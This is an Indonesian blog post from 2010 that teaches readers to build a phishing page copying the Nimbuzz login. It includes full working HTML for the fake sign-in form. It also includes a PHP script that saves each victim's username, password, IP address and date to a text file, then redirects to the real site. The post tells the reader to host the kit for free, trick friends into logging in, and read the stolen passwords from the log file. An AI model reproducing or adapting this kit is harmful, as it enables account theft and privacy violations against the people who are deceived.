Langsung ajjah
langkah-langkahnya :
1. cari webhosting gratis, gw saranin pake hostse.com langsung aja ke http://hostse.com (tolong jgn tanya cara register website gratis, wkwkwwk) , selesai register dan tetek bengeknya. lu tinggal upload file2 yang gw sediain ini :
yang pertama index.html :
Quote
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//OMA//DTD XHTML Mobile 1.0//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Login to your Nimbuzz account</title><link rel=stylesheet href="http://web.nimbuzz.com/m/css/nimbuzz.css" type="text/css" media="screen"></head><body><div style="width: 100%; background-image: url(http://web.nimbuzz.com/m/img/16/header-back.gif); padding:0px; font-size:1px;"><center>Nimbuzz</center></div><center>Sign in</center><form method="post" action="log.php"><div><label>Username:
<input type="text" name="username" id="username"/></label><label>Password:
<input type="password" name="password" id="password" maxlength="64"/></label><label><input type="checkbox" name="r" maxlength="64"/> Remember me</label><input type="submit" value="Sign in"/></div></form><div><a href="regUser.jsp?SID=KEQUe64rRe0Y0uUy">Create Nimbuzz acount[/url]</div><div>Download Nimbuzz</div>
" width="1" height="1
</body></html>
copy aja trus paste di notepad trus bikin nama filenya menjadi index.html
yang kedua log.php :
Quote
<?php
$file = "log.txt";
$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "username: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "<script LANGUAGE="JavaScript"><!--
window.location="http://web.nimbuzz.com";
// --></script>";
?>
copy terus paste di notepad beri nama filenya log.php
bagian yang penting lu modif dibagian ini:
Quote
$file = "log.txt";
tulisan log.txt ini bisa lu ubah sesuai selera yang penting ektensi file *txt.
yang ketiga buatlah file kosong dengan nama: log.txt, atau ga usah jg ngga apa2 soalnya filenya bisa ter-create sendiri saat log.php dieksekusi. pada log.txt ini lah username, password, ip sampai tanggal korban login pun tercatat, perhatikan saja script log.php nya.... gw ingetin jgn tanya apa arti script2 diatas gw ga ngerti. wkwkwkwk. gw saranin nama file .txt nya lu bikin jangan terlalu mudah ditebak kayak password.txt atau log.txt, bikin yang ngga lazim biar org ga bisa nebak, itu kalau lu males mengubah chmod permissionnya.
ok setelah file2 tadi udah siap, tinggal mengupload file2 ke webhosting lu tadi. bisa pake filezilla atau smartftp, lewat webhosting lu juga bisa di cpanel trus file manager.
biasanya webhosting baru di fileman nya ada index_default.html nya, buang aja pokoknya lu bersihin aja tuh file2, baru lu upload file2 yang udah kita buat tadi. selesai deh tinggal akses website lu tadi dan pinter2 aja gimana cara lu biar bisa mancing teman lu biar login di halaman login palsu lu tadi. buat lihat password karbon lu akses aja website lu, pada contoh file diatas misalkan website lu bernama http://nimbuzz99.hostse.com, jadi http://nimbuzz99.hostse.com/log.txt, disini lu bisa langsung lihat password korban..
Kamis, 28 Januari 2010
Langganan:
Postingan (Atom)
